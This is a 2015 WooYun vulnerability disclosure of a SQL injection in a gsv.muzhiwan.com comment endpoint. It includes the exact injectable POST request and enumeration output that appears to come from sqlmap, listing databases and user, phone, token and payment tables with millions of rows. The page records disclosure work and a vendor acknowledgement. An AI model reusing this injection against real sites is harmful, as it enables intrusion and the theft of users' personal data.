当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0134678

漏洞标题:拇指玩某站SQL注入涉及千万用户数据

相关厂商:muzhiwan.com

漏洞作者: 孤风

提交时间:2015-08-17 12:11

修复时间:2015-10-05 15:12

公开时间:2015-10-05 15:12

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-17: 细节已通知厂商并且等待厂商处理中
2015-08-21: 厂商已经确认,细节仅向厂商公开
2015-08-31: 细节向核心白帽子及相关领域专家公开
2015-09-10: 细节向普通白帽子公开
2015-09-20: 细节向实习白帽子公开
2015-10-05: 细节向公众公开

简要描述:

全站数据库,千万用户

详细说明:

注入点:

POST /index.php?action=detail&opt=getAjaxComment HTTP/1.1
Content-Length: 59
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://gsv.muzhiwan.com/
Host: gsv.muzhiwan.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
num=1&sid=-1*


数据库:

available databases [25]:
[*] `googleinstall\x05`
[*] anquanxia
[*] applanet_user
[*] bug
[*] googlemarket
[*] googlemarketgame
[*] information_schema
[*] muzhiwan
[*] muzhiwan130409
[*] muzhiwan130417
[*] muzhiwanbbs
[*] muzhiwanbbstest
[*] muzhiwantest
[*] mysql
[*] mzw
[*] mzw_new_gz
[*] mzw_oa
[*] mzwtest
[*] redmine
[*] sdk
[*] stat
[*] stat_sdk
[*] test
[*] testlink
[*] wikidatabase


这个140W

Database: muzhiwan
+-----------------------------+---------+
| Table | Entries |
+-----------------------------+---------+
| mzw_staticgameinfo | 31912349 |
| mzw_usertag_tab | 2099307 |
| mzw_userinfo_tab | 1406807 |
| mzw_comment_tab | 300143 |
| mzw_baidubind_tab | 89415 |
| mzw_sf_categorydetail_tab | 47967 |
| mzw_commentreview_tab | 24978 |
| mzw_user_cloudpush_tab | 20680 |
| mzw_sf_pan_tab | 15718 |
| mzw_mobileindex | 15368 |
| mzw_appscoreinfo_tab | 9647 |
| mzw_user_behaviour | 7741 |
| mzw_sf_get_tab | 3347 |
| mzw_user_subjectbind_tab | 3229 |
| mzw_sf_scoreinfo_tab | 3215 |
| mzw_wendatopic_tab | 3025 |
| mzw_ad_item | 2795 |
| mzw_topicdetail_tab | 2286 |
| baidutest | 2127 |
| mzw_sf_comment_tab | 1832 |
| mzw_user_subjecttag_tab | 582 |
| mzw_packutils_data | 231 |
| mzw_user_subjectcomment_tab | 223 |
| mzw_corp_score_tab | 214 |
| mzw_topiccomment_tab | 192 |
| mzw_sf_getcomment_tab | 189 |
| mzw_user_subjectinfo_tab | 183 |
| mzw_sf_commentreview_tab | 126 |
| mzw_topicinfo_tab | 71 |
| mzw_user_subjectreview_tab | 60 |
| mzw_topicreview_tab | 49 |
| mzw_ad_agency | 44 |
| mzw_ad_rules | 32 |
| mzw_sf_user_recommend_tab | 28 |
| mzw_packutils_users | 23 |
| mzw_sf_categoryinfo_tab | 19 |
| mzw_sf_to_tab | 12 |
| mzw_sf_upload_tab | 10 |
| mzw_packutils_error | 9 |
| mzw_filterword_tab | 1 |
+-----------------------------+---------+


这个900W

Database: mzw
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| mzw_users | 9253514 |
| mzw_game_net_giftbind | 8458252 |
| mzw_log_goodgame_0 | 4105277 |
| mzw_user_reg | 3969609 |
| mzw_cp_game_gift_code | 2800896 |
| mzw_users_phone | 2360835 |
| mzw_phone_msg_log | 2122518 |
| static_sdk_compatibility | 1961833 |
| mzw_users_accesstoken | 1770728 |
| mzw_favorite | 1490185 |
| mzw_users_origin | 1461478 |
| mzw_users_profile | 1427138 |
| mzw_save_game | 1107826 |
| mzw_sdk_pay_orders | 987482 |
| mzw_game_v_comment_reply | 972970 |
| mzw_feeds | 711900 |
| mzw_users_resetpwd | 700378 |
| market_model_info | 480322 |
| mzw_game_img_webp | 420649 |
| mzw_game_article_detail | 354736 |
| mzw_game_article | 306657 |
| mzw_game_v_img | 210489 |
| mzw_userdevice_bind | 205681 |
| mzw_admin_editlog | 198266 |
| mzw_models | 168708 |
| mzw_admin_gameeditlog | 125817 |
| mzw_game_v_img_copy | 108105 |
| mzw_save_game_comment | 103315 |
| mzw_game_search_tags_bind | 90972 |
| mzw_game_v_downlist | 56239 |
| mzw_users_sign | 52636 |
| pre_ucenter_members_cpfrom502 | 51740 |
| mzw_feedback | 50331 |
| lanxun_url | 44606 |
| mzw_game_v | 44327 |
| mzw_game_tags_bind | 39455 |
| mzw_game_v_img_temp | 38457 |
| mzw_game_google | 37985 |
| mzw_game_album_contents | 34291 |
| mwz_sdk_user_reg_log | 29745 |
| mzw_game_vote | 26823 |
| mzw_game_v_downlist_copy | 26458 |
| mzw_game_unzip_diff | 26398 |
| mzw_report_tab | 23040 |
| mzw_crack_wishing | 22739 |
| mzw_censorword | 21145 |
| `group` | 18420 |

漏洞证明:

见上

修复方案:

2333

版权声明:转载请注明来源 孤风@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2015-08-21 15:11

厂商回复:

您好,我们会尽快修复

最新状态:

暂无